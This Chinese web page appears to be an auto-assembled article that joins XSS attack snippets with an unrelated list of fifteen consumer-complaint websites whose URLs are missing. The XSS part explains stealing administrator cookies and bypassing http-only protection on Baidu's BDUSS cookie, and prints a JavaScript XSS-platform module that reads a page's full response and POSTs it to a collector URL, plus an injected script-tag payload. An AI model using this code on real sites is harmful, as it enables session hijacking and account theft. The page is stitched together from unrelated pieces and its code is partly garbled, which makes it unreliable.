本文目录一览:
- 1、如何通过 XSS 获取受 http
- 2、如何使用xss平台盗取cookie
- 3、如何通过 XSS 获取受 http-only さcookie
- 4、如何关闭跨站点脚本 (XSS) 筛选器
- 5、网上投诉最有效的平台
如何通过 XSS 获取受 http
要想获得xss,首先得有xss漏洞
引起XSS的主要原因是因为在前端在对用户输入的字符的过滤上没有过滤完全,导致用户输入的代码被执行。
要想获取XSS。
首先,你先确定输入的地方有XSS,一般来说来测试,就是在输入的地方使用javascript输入
javascri pt:alert('XSS')
如果在页面上弹出一个框,则证明有XSS漏洞
然后就可以使用javascript 来进行各种渗透,比如获取管理员cookie,蠕虫,等等漏洞
具体的原理,太多,写出来不方便,可以看百度百科
如何使用xss平台盗取cookie
截取的是你的网站的 xss真正的原理是将代码插入到某个网页里面,当浏览器访问这个网页的时候,就会执行你写的代码。如果这个代码具有获取cookies的功能,即可获得当前页面的cookies 然而不同的网站cookies是不同的,也是不允许互相访问的。
如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = ';id={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=;/script
如何关闭跨站点脚本 (XSS) 筛选器
这个错误是由于 IE8 的跨站脚本(Cross-site scripting, XSS)防护阻止了跨站发送的请求。
点击 IE8 的“工具”-“Internet 选项”,进入“安全”选项卡,打开“Internet”下方的“自定义级别”,在“安全设置”对话框中找到“启用 XSS 筛选器”,改为“禁用”即可。
网上投诉最有效的平台
这个平台不管是我们线上、还是线下只要出现侵害消费者利益的事都可以投诉。
网址:
02
12321网络不良与垃圾信息举报受理中心
12321,一看名字,是不是就觉得和12315 有异曲同工之妙呀!
如果接到骚扰电话、垃圾短信、爆通讯录等sao操作,可以将这些电话提交至举报中心哦!
网址:
03
国家邮政局申诉网站
网购已经成为了大家的日常习惯。对于商家,可以在购物平台进行投诉;那么对于快递呢?物流业老大哥邮政的官网上投诉了!只要大家在网上按步骤填写了合理的投诉,邮政有求必应,会回访询问解决进展。
网址:
04
三大运营商投诉
联通、移动、电信最怕的投诉网站,这个比打10086、10010、10000强多了,真的是有奇效而且效率超高。这个小编试验过,而且投诉完,运营商那边会主动联系你,商量解决方案,然后平台会有回访的。
网址:
05
网贷投诉平台
这年头,谁还能没有个网贷,万一遇到不良黑心网贷,一定要拿起投诉武器来维护自己合法权益。这个网站就是不良网贷的克星,大家一定要记住。
网址:
06
国家市场监督管理局
经常在朋友圈看到一些微商打着进口旗号贩卖一些三无产品。保健品、化妆品、食品、药品则是其中的重灾区。虽然我们这些资深网民不易中招,但对于长辈们来说,很容易就上当受骗了。这时候,上食药监督局一查,这些商品究竟是否正规,是否登记在案,就一目了然了。
查询被召回的缺陷产品,对于消费者来说,购物之前先查一查,就不用担心买到爆雷产品了。
网址:
07
汽车质量投诉网
当你的爱车出现各种质量问题,你能做的不仅仅像“奔驰女车主”那样维权。
网址:
08
旅游投诉
不管是黑酒店宾馆、黑景区、黑旅行社、黑导游等宰客问题,都可以来这个平台投诉,有了他可以保证你出行不被宰。
网址:
09
侵权盗版举报
当你遇到有关文字、影视、音乐、游戏、软件等作品以及互联网网站、网络销售平台、移动智能终端应用软件商店等领域涉及侵权盗版的违法行为时一定记得来这里投诉。
网址:
10
扫黄打非举报
当你遇到淫秽色情信息、盗版侵权、非法宗教出版物、非法出版活动、假媒体、假记者、假记者站时,一定记得来这里投诉。
网址:
11
中国互联网违法和不良信息举报中心
当你遇到名誉、隐私被侵犯或者是有人造谣生事等网络违法犯罪时,可以在这里进行举报投诉。
网址:
12
全国文化市场举报平台
对以下领域违法行为的举报投诉:
1、营业性演出活动
2、歌舞娱乐和游艺娱乐等场所经营活动
3、艺术品经营活动
4、互联网上网服务营业场所经营活动
5、互联网音乐、互联网游戏、网络表演、互联网动漫文化活动
6、文化和旅游行政部门管理的其他文化经营活动。
网址:
13
中国领事服务网
当你在国外遭遇不法侵害就登录这个网站,《战狼》吴京说的那样,当你在海外遇到一切事情都可以来这里解决。
网址:
14
黑猫投诉
「黑猫投诉」是新浪旗下消费者服务平台,通过黑猫投诉,消费者能够随时反馈消费过程中遇到的各种问题,依靠海量的企业库及极具影响力的各领域专家,消费者的诉求可以得到快速的反馈和专业的指导,提升消费体验,从而建立起企业和消费者之间的沟通桥梁。
网址:
15
聚投诉 21CN
聚投诉是一家公益性的互联网新闻信息服务平台,中央网信办批准,有政府背景,可以说十分靠谱。如果和各种平台有过经济纠纷,在21CN 上投诉,效果不错。投诉都能收到反馈,毕竟21CN 可是目前网上最大的投诉网站。21CN 也会定期推送一些高风险、高预警的公司,提醒大家不要掉以轻心。
网址:
好了这就是我目前收集的15个投诉网站,应该可以应付的了目前生活中的方方面面。建议大家多多转发,让身边的亲朋好友都知道,以免遇到侵权行为的时候,投诉无门。